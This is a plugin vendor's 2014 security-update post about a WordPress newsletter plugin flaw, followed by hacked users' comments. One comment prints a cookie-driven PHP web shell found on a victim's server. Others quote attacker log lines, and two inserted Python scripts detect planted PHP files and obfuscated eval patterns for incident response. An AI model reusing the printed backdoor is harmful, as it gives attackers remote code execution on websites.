Security Update, Part 2.

MailPoet users, we are really sorry.

Last week's exploit was bad, and we should never have released a WordPress plugin with that flaw in it.

We kept researching and running security tests on our plugin to see if we were missing something else.

A few hours ago Dominic Lüchinger, security engineer (https://twitter.com/drdol), contacted us to disclose a possible attack leveraging the way PHP merges all GET, POST and cookie parameters into the $_REQUEST array. It's directly related to the previous vulnerability, and we have just released a new version, 2.6.8, to address this particular threat.

It's a common belief that WordPress is an insecure platform and that all plugins are full of exploits. We need to change this right now!

We are introducing internal security reviews where we’ll run penetration tests on internal WordPress websites in order to catch exploits faster.

We are also introducing a bounty program for exploits. Please contact us and we’ll let you know how to get in touch on a secure channel.

We value the privacy and security of our users above anything else, and we'll work every day to prevent things like this from happening again.

On your side, please always keep your plugins up to date. If you can't because you customized a particular version, please download the standalone security package, which has been updated too.

Thanks.

How to install the standalone plugin?

  • Download the plugin here
  • In your Admin, go to menu Plugins > Add
  • Select the tab “Upload”
  • Upload the .zip file you just downloaded
  • Activate the plugin
  • That’s it!


DISCUSSION

    Author’s gravatar

    Hi,

    Thank you for this information. On my website I have version 2.6.7. What is the procedure? I don't understand. What is mpoet-retro-secured.php? How do I use it?

    Thank you.

    Author’s gravatar

    Hi,

    You can just update to the latest version, 2.6.8.

    Thanks.

    Author’s gravatar

    Thanks for working hard to get out ahead of the issue!

    I’m sure it was a big shock to be presented with your first public vulnerability and I truly appreciate the efforts you are taking to address the problems.

    Thanks for a wonderful plugin!

    Author’s gravatar

    Thanks for the support Dave!
    We'll do our best so that this sort of issue never happens again.

    Author’s gravatar

    Well, I can't let you get away scot-free! Looks like the new updates screw up the background color in email clients; browser display is still correct. :)

    Author’s gravatar

    I just got notified by 1and1 that malicious code was uploaded to the theme folder. Will updating be enough to fix the problem?

    Author’s gravatar

    Hi G,

    Actually updating your MailPoet to the latest version 2.6.8 makes sure that nobody can attack your website.

    If 1and1 spotted that a malicious theme had been uploaded to your site, I suppose they already took care of it.

    Go ahead and check if anything is left there in your upload folder: wp-content/uploads/wysija/themes

    Check if there is a theme including a PHP file and delete it if that’s the case.

    Otherwise I recommend you to get in touch with 1and1 directly to get more information.

    Please do get in touch with us if you have further questions:
    http://support.mailpoet.com/feedback/

    Author’s gravatar

    I am also with 1 & 1, and the vulnerability was exploited.

    I inquired as to the actions taken on their end, and the response was "Our anti-virus system doesn't prevent files from being uploaded. If it detects a file that it deems malicious it simply changes the permissions to 200, or write only for its owner."

    The PHP file is not there in the theme upload folder (only an index.html with size of 0). Is there something I should be doing?

    Thanks.

    Author’s gravatar

    Hey Keith,

    Have you checked the subdirectories of the themes folder? This is where you will find the malicious PHP file if there is any:

    wp-content/uploads/wysija/themes/malicious_theme/…

    1and1 is pro-active on that one; that's good: it means that no PHP file can be executed, making the upload of malicious files completely harmless.

    This said, look for the file in your FTP and try to delete it.

    Author’s gravatar

    Thanks, I think I may have found it. I deleted the folder with the php file.

    Author’s gravatar

    Hi

    We are running version 2.6.6 and can’t update immediately as we have done a load of customisation.

    How do we use mpoet-retro-secured.php? Do we just upload it to the plugin directory or what?

    We done of dealing with this matter

    Author’s gravatar

    Hello Alex,

    Sorry for the inconvenience.

    If you want to keep using 2.6.6, yes, go ahead: upload the mpoet-retro-secured plugin and activate it on your site.

    This will apply the same correction included in the version 2.6.8.

    Author’s gravatar

    oohh. Not a happy bunny.

    Followed your instructions and uploaded and activated the plugin mpoet-retro-secured. When I activated it, it showed that there was an update to mpoet-retro-secured, so I updated.

    It seems that this second update has applied 2.6.8 and has now overwritten all of the customisation that we have done on the plugin, which will now have to be redone.

    Author’s gravatar

    Hello Alex,

    Sorry to hear about that.

    I don't know why the mpoet-retro-secured would have an update link; that should not be the case. There is just one version of that plugin, no update available.

    Could you send us a copy of your mpoet-retro-secured? I'd like to take a look; send it to support [at] mailpoet dot com

    Thanks

    Author’s gravatar

    Hi,

    I have MailPoet Newsletters 2.6.6 with the option to update to version 2.6.8 and I have MailPoet Newsletters Premium 2.6.6 with the option to update to 2.6.7.

    In what order should I update them or do I just need to update one?

    Thanks,
    Mark

    Author’s gravatar

    Hello Mark,

    Simply update to the latest version.

    Free plugin version: 2.6.8
    Premium plugin version: 2.6.7

    Hope this helps!

    Please do get in touch privately if you require more help:
    http://support.mailpoet.com/feedback/

    Author’s gravatar

    Hi,
    my provider just emailed me that there was an upload of a malicious file. ../wp-content/uploads/wysija/themes/main/index.php

    Is it enough to run the new update?

    Thanks
    Marco

    Author’s gravatar

    Hello Marco,

    My sincere apologies about this.

    Yes, you need to update to the latest version 2.6.8 and remove that theme using your FTP.

    If you need help with that, please do get in touch with us here:
    http://support.mailpoet.com/feedback/

    Author’s gravatar

    Mailpoet,

    This simply isn’t good enough. It is completely unacceptable to run software that has flaws such as this. You need to fix this and fix it quickly.

    I too have had a malicious file added to my site AND your update has failed to load; I now can't update ANY plugins and I can't delete them either.

    I am giving you until Tuesday morning to resolve this or I WILL sue you for any damage to my website.

    Get it fixed and get it fixed fast!

    Author’s gravatar

    Andy,

    My apologies once again.

    I’ve replied to you by email already. I hear you and we’ll do our best to sort you out.

    Let’s continue this conversation by email for now until we solve the issue on your site.

    Author’s gravatar

    Hey, thank you for the support and this information. Don't worry, I have confidence in MailPoet and your quick work, team!

    Author’s gravatar

    Thanks for your support!
    Much appreciated :)

    Author’s gravatar

    Hi,

    Since all these updates there is a CSS problem on some browsers. When the newsletters are opened in Mail or in Safari they look really big. I've posted a support ticket and had someone give me some advice, but none of it has worked, and since we have to wait 48h for every answer, this can last for quite a while if the solution provided fails every time. Are you working on this? I have unhappy clients to whom I advised taking MailPoet, so that makes me look bad.
    Thanks for your understanding.

    Chrys

    Author’s gravatar

    Hey Chrys,

    We're working actively on this issue; we'll try to release a new version as soon as possible.

    We just need more time… I’ve answered privately to your question with a solution.

    Thanks for your patience!

    Author’s gravatar

    Jumping in on this post if I may: this is also happening to us as well. Looks great when we create it, but when we preview it the formatting is all over the shop.

    Need to know what to do to fix this, before we apply our own modifications to the plugin again.

    Thanks

    Alex

    Author’s gravatar

    Hey Alex,

    Actually we're working on those issues right now. We'll try to fix it asap; meanwhile, if you're in a rush to send a newsletter you can always revert to 2.6.6, which didn't have those rendering issues.

    Our old versions are now patched and can be used safely.
    http://wordpress.org/plugins/wysija-newsletters/developers/

    Regarding modifications of our code, I'd recommend avoiding them as much as you can so that you can freely update our plugin any time we have new modifications.

    Author’s gravatar

    Hi Ben

    Yes, I agree about the code, but in order to get the functionality required and email the information, it was necessary to modify the code.

    Can you let me know when the formatting issues are fixed, as I don't want to modify the code again, only to need to update again.

    I am hoping that your rewrite of this excellent plugin will allow us to add additional bits of functionality without upsetting the original code or creating problems with updates.

    Author’s gravatar

    Alex,

    Sure thing, through our rewrite we’ll try to make it easy for you to extend.

    I’ll send you a copy of a patched version which is currently being tested.

    I've run a few tests and it works fine so far.

    Cheers!

    Author’s gravatar

    My site admin returns a blank screen. Since I'm on holiday I could not yet update. The blank screen just happened overnight; no changes to the site have been made!

    Renaming your plugin directory (incl. premium) resolved the blank screen, but obviously no (new subscription) mail will be sent.

    How can my site's admin go blank without changing anything, and what is the fastest fix?

    Author’s gravatar

    Sorry for typos.. Dutch spelling checker on phone :(

    Author’s gravatar

    Hello and thank you, Poets:

    We blocked access to /web and the following scripts were analysed as being malicious:

    web/wp-content/uploads/wysija/bookmarks/large/10/global.php
    web/wp-content/uploads/wysija/bookmarks/medium/15/press.php
    web/wp-content/uploads/wysija/bookmarks/medium/17/press.php
    web/wp-content/uploads/wysija/bookmarks/medium/22/model.php
    web/wp-content/uploads/wysija/bookmarks/small/01/page.php
    web/wp-content/uploads/wysija/bookmarks/gallery.php

    Author’s gravatar

    We have been infected by a PHP spambot through MailPoet:

    37.139.47.243 – – [11/Jul/2014:00:37:32 +0200] “POST /wp-content/plugins/wysija-newsletters/helpers/autonews.php HTTP/1.1” 200 222 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0”
    37.139.47.243 – – [11/Jul/2014:00:37:32 +0200] “GET /wp-content/plugins/mycred/addons/coupons/includes/alias.php HTTP/1.1” 200 78 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0”

    A new file was uploaded at 00:37 and started sending spam until I deleted the file.

    I have uploaded MailPoet and hope it will be the end of this attack.

    Author’s gravatar

    Thanks for sharing David,

    These two lines in your log are odd though, as they don't look like they're related to the exploit discovered in versions below 2.6.7.

    The first one is strange, as it cannot execute anything since it can only be called through a request on /wysija-newsletters/index.php.

    The second one is another request on a different plugin called mycred. You might want to look it up too.

    Get in touch with us on our support page if you need further help:
    http://support.mailpoet.com/feedback/

    Thanks

    Author’s gravatar

    It is strange because at the time of the call to wysija-newsletters/helpers/autonews.php the file alias.php has been uploaded. In the folder of another plugin, that is true, but it is a funny coincidence.
    For the moment the PHP spambot script hasn't come back, so I'm not worried anymore. Thank you for your work.

    Author’s gravatar

    Hi,
    My provider has deactivated my website so that I cannot use WordPress's web interface to update my MailPoet plugin.
    I'm used to changing some data in an FTP client and have no idea what to do.

    Author’s gravatar

    My provider deleted all my files, also my store, everything. I can just get a backup for 120 USD. Thank you for the problems. Shit happened!

    Author’s gravatar

    I’m very sorry Paulo, we wish we could have avoided that.
    The last thing we want is our users having this sort of problems.

    Author’s gravatar

    Forgot I had the free version installed on a website and it got taken down. My hosting provider was notified and did a security scan. Unfortunately for me they charged me for putting the site back and the security scan, to the tune of $59.
    I just purchased the premium version right before the attack. Luckily I was working on it and having problems, so I was aware of all of the updates there and did them.
    I have to say, the money I paid for the premium version was money I thought was well spent due to the time it would save me. Now after all of this, my time has been diverted to all of the issues it’s caused.
    Very poor experience.

    Author’s gravatar

    I’m really sorry Rick.

    Author’s gravatar

    My provider has deactivated my website so that I can't use WordPress's web interface to update my MailPoet plugin.
    I have no idea what to do.

    Author’s gravatar

    If you have cPanel access it should be easy to get to the file manager to see what's happening. Other than that you should contact your host provider and ask what they can do to help.

    Author’s gravatar

    New attack today:

    After the calls to back.php and sql.php a new file.php has been uploaded and started sending mail.

    37.139.47.243 – – [21/Jul/2014:18:26:09 +0200] “POST /wp-content/plugins/wysija-newsletters/helpers/back.php HTTP/1.1” 200 48 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0”
    37.139.47.243 – – [21/Jul/2014:18:26:10 +0200] “POST /wp-content/uploads/wysija/bookmarks/medium/08/sql.php HTTP/1.1” 200 221 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0”
    37.139.47.243 – – [21/Jul/2014:18:26:10 +0200] “GET /wp-content/plugins/wysija-newsletters/js/vendor/file.php HTTP/1.1” 200 78 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0”

    Are you sure all security holes are known?

    Author’s gravatar

    David,

    Based on your logs, it seems that more files have been uploaded and modified in your upload folder and the folder of MailPoet’s plugin.

    For instance, this file doesn't exist in our plugin:
    /wp-content/plugins/wysija-newsletters/js/vendor/file.php
    It has been added by the person hacking you, and I wouldn't be surprised if this file:
    /wp-content/plugins/wysija-newsletters/helpers/back.php
    had been modified by the hacker as well.

    The best way to get rid of the issue in your case is to get a backup of your website prior to the attack (files and DB) and change all of the passwords on your server: FTP, SSH access and database. Get in touch with your host if you don't know how to do that.

    The person who hacked your website might have had his hands on all of these accesses.

    Author’s gravatar

    Hey Ben,

    “get a backup of your website prior to the attack” is exactly what I’m trying to figure out… I have made backups at least monthly so which one would you trust based on the timeline of this issue? Restore back to june, may, april…? Is there any signature to look for in the database to determine which backup is definitely clean, i.e. pre-attack?

    Thanks, Frank

    Author’s gravatar

    We’ve started to be notified of sites being hacked once the first security release was out and announced by Sucuri on the 1st of July.

    Therefore I believe that getting a backup from June should do fine.

    Unless your hacker knew about that security issue before it became public. It is possible but unlikely.

    There is no particular signature to look for, as a hacker has a wide range of possibilities once he is in (between files and DB).

    If you've found malicious files on your server, you can use the creation date of these files in order to track down the date of the hack.

    Also the logs of your server can help you figure out which malicious files have been uploaded and when they were uploaded.
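    Ben's suggestion to use the server logs to find out which files were uploaded and when can be scripted. The Python below is an added example, not MailPoet's code or anyone's in this thread: it parses combined-format access log lines (a constructed sample modelled on David's entries, with TEST-NET addresses), flags any request for a PHP file under wp-content/uploads and any request into the plugin directory for a file not in a known-good manifest (the manifest here is a constructed stand-in; build it from a clean copy of the plugin), and reports the earliest suspicious timestamp as the date a trusted backup must predate.

```python
import re
from datetime import datetime

# Files the plugin legitimately ships under /wp-content/plugins/wysija-newsletters/.
# Constructed stand-in: in practice build this set from a clean copy of the plugin
# (the zip from wordpress.org), never from the possibly tampered install.
PLUGIN_PREFIX = "/wp-content/plugins/wysija-newsletters/"
KNOWN_PLUGIN_FILES = {"index.php", "helpers/autonews.php", "helpers/back.php"}

# Apache/nginx "combined" format: client ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Anything executable served from the uploads tree is suspicious: uploads should
# only ever hold static assets (images, an empty index.html).
UPLOADS_PHP_RE = re.compile(r"^/wp-content/uploads/.*\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Constructed sample, modelled on the entries quoted in this thread; the client
# addresses are from the TEST-NET documentation ranges, not real hosts.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jul/2014:02:11:40 +0200] "GET /wp-content/uploads/wysija/themes/test/1.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jul/2014:09:15:01 +0200] "GET /wp-content/plugins/wysija-newsletters/index.php?controller=subscribers HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jul/2014:00:37:32 +0200] "POST /wp-content/plugins/wysija-newsletters/helpers/autonews.php HTTP/1.1" 200 222 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jul/2014:00:37:33 +0200] "GET /wp-content/uploads/wysija/themes/main/index.php HTTP/1.1" 200 78 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jul/2014:09:15:01 +0200] "GET /wp-content/uploads/wysija/themes/default/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2014:18:26:10 +0200] "POST /wp-content/uploads/wysija/bookmarks/medium/08/sql.php HTTP/1.1" 200 221 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2014:18:26:10 +0200] "GET /wp-content/plugins/wysija-newsletters/js/vendor/file.php HTTP/1.1" 200 78 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields we need from one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop the query string
        "status": int(m["status"]),
    }


def classify(entry):
    """Name the rule an entry trips, or None when it looks like normal traffic."""
    path = entry["path"]
    if UPLOADS_PHP_RE.match(path):
        return "php_under_uploads"
    if path.startswith(PLUGIN_PREFIX) and path[len(PLUGIN_PREFIX):] not in KNOWN_PLUGIN_FILES:
        return "unknown_plugin_file"
    return None


def triage(log_text):
    """Return (findings, first_seen): every suspicious request, plus the earliest
    timestamp at which each suspicious path appears, which bounds the compromise date."""
    findings, first_seen = [], {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason is None:
            continue
        entry["reason"] = reason
        findings.append(entry)
        seen = first_seen.get(entry["path"])
        if seen is None or entry["ts"] < seen:
            first_seen[entry["path"]] = entry["ts"]
    return findings, first_seen


def earliest_suspicious(first_seen):
    """Oldest suspicious timestamp; a backup must predate this to be trusted."""
    return min(first_seen.values(), default=None)


if __name__ == "__main__":
    found, first = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']:%Y-%m-%d %H:%M:%S}  {f['ip']:<14} {f['method']:<4} "
              f"{f['status']}  {f['reason']:<20} {f['path']}")
    print("restore from a backup taken before:", earliest_suspicious(first))
```

    A 404 for a PHP file under uploads is still worth listing: it shows when the probing started, even if that particular file was never written.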

    Author’s gravatar

    There are still PHP files in subdirectories of wp-content/uploads/wysija/bookmarks/

    I think everybody must delete them to avoid new attacks.

    Author’s gravatar

    WordPress should really think about how updates are proposed on the admin panel. For critical updates like this one, WordPress should notify admins by email and on the home of the admin panel with a bloody red flag.

    Author’s gravatar

    Yes, this would be a great feature to have.

    Author’s gravatar

    Handling a non-profit volunteer entity with this issue breaking our website, was not a welcome fix to have to recreate the entire site. Will you have some form of automatic update and notification system?

    Author’s gravatar

    Hello Mark,

    Sorry to hear that your site was hacked through that vulnerability…

    There is already an update notification system in place within WordPress, so that when we update our plugin you see it from the backend of your site. Make sure you always keep an eye on those and always keep your plugins updated to the latest version, all of them.

    Also, for that particular security issue, we sent all of our users subscribed to our mailing list an email straight after the security release was out. It was urging you to update.

    We can only encourage you to subscribe to our newsletter in order to be notified as soon as possible if we have important updates such as this one.

    You can find the subscription form in the footer and the sidebar of our site.

    Author’s gravatar

    I update everything regularly and on time.
    I am subscribed to your mailing list and it's only today, 2 DAYS LATER, that I receive your email about this.

    It’s not even clear because I had 2.6.8 and your email isn’t clear whether or not that version was safe.

    I have many websites, live commercial websites, and what you are saying is I have to shut them down and reinstall an old (a MONTH-old!!!) back-up and then replenish the content, on my time and my money.

    I did my part (keeping up to date) and yet I’m still stuck.

    I had recommended you. I can't anymore. That's too many security issues in too short a time, and I'm paying to clean up my clients' sites when I'm not paid to do so and I didn't charge them for future hackings (of course).

    Author’s gravatar

    Marie,

    Sorry about the confusion.

    The email you’ve received today is a reminder for our users who forgot to update their MailPoet. The version 2.6.8 was safe, there is no problem with that one.

    If you've updated regularly, there shouldn't be any problem; you only need to start a restoration process if you have been hacked, which most likely didn't happen if you updated on time.

    Author’s gravatar

    The sites seem OK. Except one of them has a folder in wysija/themes that is called "Main" (Default is still there). In that "Main" theme there is an index.php file (your email said there wasn't supposed to be any).
    That php file says:

    (php) **
    * @package Joomla.Plugin.System
    * @since 1.5
    *
    *
    */
    class PlgSysJoomla {
    public function __construct() {
    $file=@$_COOKIE[‘ljNqe3’];
    if ($file){ $opt=$file(@$_COOKIE[‘ljNqe2’]); $au=$file(@$_COOKIE[‘ljNqe1’]); $opt(“/292/e”,$au,292); die();} else {phpinfo();die;}}}
    $index=new PlgSysJoomla;

    Joomla! in a WP install!

    The other files in that folder include an error log which includes many lines similar to this: [05-Jul-2014 06:51:52] PHP Warning: scandir(../components) [function.scandir]: failed to open dir: No such file or directory in /home/bcbemeru/public_html/wp-content/uploads/wysija/themes/main/index.php(11) : regexp code ( 1 ) : eval ( )’d code on line 34

    As if they somehow think this is a joomla site.

    ****

    Based on Sucuri’s info, I scanned (search function) for malicious code and can’t find any. I spot checked many .php files (config, index, etc.) and they all look clean.

    I believe if I remove the themes/main folder, everything should be fine without having to do anything else.

    What do you think? That strange folder was installed on July 5.

    The only other thing installed or updated on July 5 was a wysija/ folder called “Temp” in which there is only a blank index.html file.

    Before I erase anything I’d like to know if the “main” theme could have actually been generated by Wysija itself and not be related to any hack.

    Marie

    Author’s gravatar

    I am not happy.......
    I have not received the bill, but have had to have a new WordPress site uploaded in order to clear the problem.
    6 days now without a website, with a business that depends on it.
    You are responsible for this. And it seems your plugin has been insecure for quite a while.
    Sorry isn't good enough.

    Author’s gravatar

    Hello David,

    I'm truly sorry about this.

    We did as much as we could to save you from experiencing that: we tried to contact all of you through our blog, social networks and email notifications to urge you to update, we manually contacted hundreds of emergency contacts when you were on holiday, and we talked to hosting companies so that they could protect you from that even without you updating. Sadly not all of you had enough time to update, and that's unfortunate.

    Our plugin had this flaw since day one indeed, and we found out about it only now. We did our best since December 2011 and our first version to keep this plugin safe, and we corrected quite a few security issues along the way, only to finally miss that one, which is major...

    This experience is a very frustrating one. I wish we had caught it beforehand, or that we had more time for all of our users to update to a safe version before hackers started to exploit it. But this is something that just went out of our control, unfortunately.

    Author’s gravatar

    Hi,

    I just updated the MailPoet version. Is the new version 2.6.9?

    Author’s gravatar

    Yes version 2.6.9 is the latest one!

    Author’s gravatar

    Hi,

    Since I had an issue (blank WordPress admin screen) on 8 July I disabled (renamed directories) MailPoet.

    Today I took the time to look into this, reading also all comments above.

    So it seems, due to a vulnerability in the mailpoet plugin ‘hackers’ could get access to our site? Please explain what things to look for to determine if I’m hacked or not.

    Is disabling / renaming the old version enough to be safe?
    Can I delete the old files and install the new version (also premium) without losing any data / mailings?

    After doing some comparing of directories I found this file:
    841rewb3v4x.php
    It seems like it's somehow encrypted, as I cannot see what it's up to. The change date is the same as the rest of the files in the directory, but the permissions are set to (0640) while the rest of the files have 0644 as permissions?

    I cannot restore my database as I will lose all user content placed since this happened.. where to look in the database if I'm hacked?

    Hope you can give me some good answers so I can start using mailpoet again..

    Author’s gravatar

    I found all kinds of weird stuff in \wp-content\uploads\wysija\themes\

    I was looking for the text ‘eval ( base64_decode (‘
    and ‘eval ( gzinflate ( base64_decode (‘ and found 3 very suspicious files..

    I deleted the whole wysija themes directory... hope I'm 'clean' now. Any suggestions are very welcome..

    Author’s gravatar

    Hi Ramon,

    Once the site has been infected, there are many ways that the hacker could find to put hidden encoded files anywhere in your site or create hidden administrator accounts in your database.

    This is why in your case you’ll need to go through a complete backup process.

    What you need to do is to download a copy of your database and files as they are right now, in order to manually restore the part of the data (users) that will be missing in your previous backup.

    You'll need to change all of your passwords on your site as they're compromised: SQL, FTP, SSH, administrator account; and change the secret keys in your wp-config.php.

    I recommend you to read this WordPress FAQ on being hacked, it explains all of the steps very clearly: http://codex.wordpress.org/FAQ_My_site_was_hacked

    Once again we’re very sorry for all this trouble…
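    Ramon's search for `eval ( base64_decode (` and Ben's advice to look for any .php file under wp-content/uploads/wysija can be combined into one scan. The Python below is an added example, not MailPoet's code or anyone's in this thread: it builds a constructed sample install in a temporary directory (the planted files are inert stand-ins, not real malware), walks it, and reports each suspicious file with its size, mode and modification time, the details Ramon and Frank asked about when trying to date the compromise.

```python
import os
import re
import shutil
import stat
import tempfile
from datetime import datetime, timezone

# Extensions the web server would hand to the PHP interpreter.
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# The obfuscation markers quoted in the thread, tolerant of spacing variants:
# "eval ( base64_decode (" and "eval ( gzinflate ( base64_decode (".
OBFUSCATION_RE = re.compile(
    rb"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.IGNORECASE)


def scan_tree(root):
    """Walk a WordPress install and return one record per suspicious PHP file."""
    root = os.path.abspath(root)
    uploads = os.path.join(root, "wp-content", "uploads") + os.sep
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not PHP_EXT_RE.search(name):
                continue  # static assets (images, an empty index.html) are normal
            full = os.path.join(dirpath, name)
            reasons = []
            if full.startswith(uploads):
                reasons.append("php_under_uploads")  # uploads should never hold code
            with open(full, "rb") as fh:
                if OBFUSCATION_RE.search(fh.read()):
                    reasons.append("obfuscated_eval")
            if not reasons:
                continue
            st = os.stat(full)
            findings.append({
                "path": os.path.relpath(full, root).replace(os.sep, "/"),
                "size": st.st_size,
                "mode": oct(stat.S_IMODE(st.st_mode)),  # e.g. 0o640 next to the usual 0o644
                "mtime": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
                "reasons": reasons,
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree(root):
    """Constructed sample install: three planted files and three clean ones.
    The planted bodies are inert ('e30=' decodes to '{}'), not real malware."""
    files = {
        "wp-content/uploads/wysija/themes/default/index.html": b"",
        "wp-content/uploads/wysija/themes/default/logo.png": b"\x89PNG...",
        "wp-content/uploads/wysija/themes/main/index.php": b"<?php phpinfo();",
        "wp-content/uploads/wysija/bookmarks/medium/08/sql.php":
            b"<?php eval ( gzinflate ( base64_decode ( 'e30=' ) ) );",
        "wp-content/plugins/example-plugin/helper.php": b"<?php eval(base64_decode('e30='));",
        "wp-content/plugins/example-plugin/clean.php": b"<?php echo 'hello';",
    }
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)


def run_demo():
    """Build the sample tree in a temp dir, scan it, clean up, return the findings."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    try:
        build_sample_tree(root)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['mtime']}  {f['mode']}  {f['size']:>6}  "
              f"{', '.join(f['reasons']):<32} {f['path']}")
```

    Run scan_tree on the real document root after taking the copy of files and database Ben describes, so the evidence (timestamps, modes) is preserved before anything is deleted.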

    Author’s gravatar

    Hi,

    Since the problem and update my client has the following problem. When someone subscribes to her newsletter he receives an email, but the sender's name is her WordPress ID, which is a problem... How can this be fixed??

    Everything has been updated.. So I don't know what to do..

    Kind regards

    Author’s gravatar

    Amazing that you do not respond when someone is not happy about this security problem. I am only now today receiving warnings from hosting companies after I have had to have the whole site practically rebuilt...... And a bill of £500.00.
    I used to recommend this plugin to everyone; not anymore. I am already getting emails and it is not my plugin.
    Get in touch please. You have a responsibility.

    Author’s gravatar

    Hi David,

    We do answer all of our users, happy or not happy; in times of crisis, though, our answering time can be a little bit longer.

    If you need us to help you fix something, please get in touch here we’ll be glad: http://support.mailpoet.com/feedback/

    Author’s gravatar

    This is perhaps the first mistake you have made... but I think it will also be the last... :-(

    Nobody will want to trust you again, especially not all those who, like me, got infected on ALL the sites where I had the misfortune of installing your plugin...

    I am trying to save what can be saved, but above all I am going to find another, more serious plugin... sorry guys, but on this one you screwed up, and it will be known all over the web.

    Have you thought about doing something else with your life?

    Author’s gravatar

    Sorry for the consequences this may have had on your sites. We know how frustrating it can be to have to restore hacked sites.

    We fully understand the loss of trust this may have caused among some of our users, and we will do everything we can to regain it.

    As for our activities, no, we are not thinking of dedicating ourselves to something else; we have been working hard on this project for 3 years now. We have a great many things we want to accomplish with MailPoet, and we fully intend to persevere.

    Good luck with restoring your sites, in any case.

    Author’s gravatar

    I can't believe some of the users venting here in the wrong place and for the wrong reasons. It's not a support thread; it's an update on an issue that is common to WordPress itself and all developers... malicious hacking.

    We shouldn’t have to worry about malicious hacking of sites but alas there is a bunch of smart people doing evil things out there and always looking for angles to get something for nothing. The good people focus on doing good things and get caught in that loop

    We as WP owners need to be aware that the good things we get every day and the improvements are from these good people solving problems and creating time savings and efficiencies that make our businesses better.

    So sometimes the lessons we learn are harder than others, I have been hacked in any numbers of ways which either I, WordPress or Developers couldn’t have known beforehand and each time, even though it was frustrating the issue made things better. Better at finding, Better at Protecting, Better at recovering.

    When something goes wrong it makes you stronger. So now if something goes wrong I control backups, updates, improvements so that it takes mere minutes to fix or recover, yes minutes, not hundreds of pounds or having a hoster switch a site off or any loss of trust with a hard working coding team.

    Why look for someone to blame when you can turn it into a way to do things better? Why vent or rant when the proper spot is to get the support they are so willing to give. If it highlights your need to do better backups, get it done or it shows your need to keep watch on notices and updates, implement it.

    I have faith in the MailPoet team to do what they can do to make a great product that saves me time and makes my WordPress sites easier to use for email marketing. I won't be changing anything.

    I know that as a result of this issue MP will be even better and a solution I’ll be using long into the future. I am voting with both my cash and my time for MailPoet.

    Author’s gravatar

    Thanks Mark!

    We’ll keep making sure your money and time are well invested.

    Your support means the world to us!

    Author’s gravatar

    How can I tell whether my site has been infected, please?
    Thanks

    Author’s gravatar

    Hello Joe,

    You just need to look for .php files in the wp-content/uploads/wysija folder of your site.

    If you find any, you are infected.

    Author’s gravatar

    Hello.

    We used MailPoet. This week our website failed. Do you think you could help us reactivate it?

    Now we just have a temporary page.

    thank

    Author’s gravatar

    Don’t try to deflect this vulnerability in your code onto WordPress! It is disgusting that you are trying to dodge responsibility for a huge security vulnerability found in your plugin by suggesting WordPress is to blame. Take responsibility for your shoddy coding!

    Numerous clients of mine have had their websites compromised thanks to your plugin and I assure you I will be migrating them all to a more competent competitor.

    Author’s gravatar

    Hi Bill,

    We're very sorry for the frustrating experience; by no means are we trying to deflect the responsibility onto WordPress. This mistake is entirely ours and we wish we had avoided it.

    It has nothing to do with WordPress: this is our code which was flawed, not WordPress's. We know that and have no reason to avoid that reality.

    We wish you all of the luck in the world with your new newsletter plugin.

    This said, you need to be aware that what happened with our plugin could happen with another one (newsletter or not); make sure you take measures to protect your sites from this kind of situation.

    Update your plugins and WordPress frequently. And make sure you have an efficient backup in place for your files and database.

    MailPoet is not the first plugin nor the last one in WordPress which will show vulnerabilities.

    Author’s gravatar

    My host Fat Cow sent me a notification that they found a problem (caused by the wysija plugin) and suspended the website… but I checked in the uploads folder and can’t find any php file. I looked in all the folders and subfolders…

    Author’s gravatar

    I take that back… found it in the mail folder and deleted it.

    Author’s gravatar

    Alright, is your site back on then?

    Author’s gravatar

    Chin up,

    Mistakes are always possible, but it is a bit too easy to blame the person who forgot to lock the door without seeing that the windows were wide open…

    In other words, this mishap will have allowed all of you, like us

    Author’s gravatar

    Thanks for the support Christian, we greatly appreciate it!

    Author’s gravatar

    Oops… continued.. to make progress on this so important point of security. Not hacked on my two sites, even though one of them is under attack almost constantly… but I added a lot of security via htaccess… it will limit the damage.

    In any case we await the future developments.
    No trust issues.
    KUTGW

    Author’s gravatar

    Thanks again for your trust!

    Author’s gravatar

    @ben
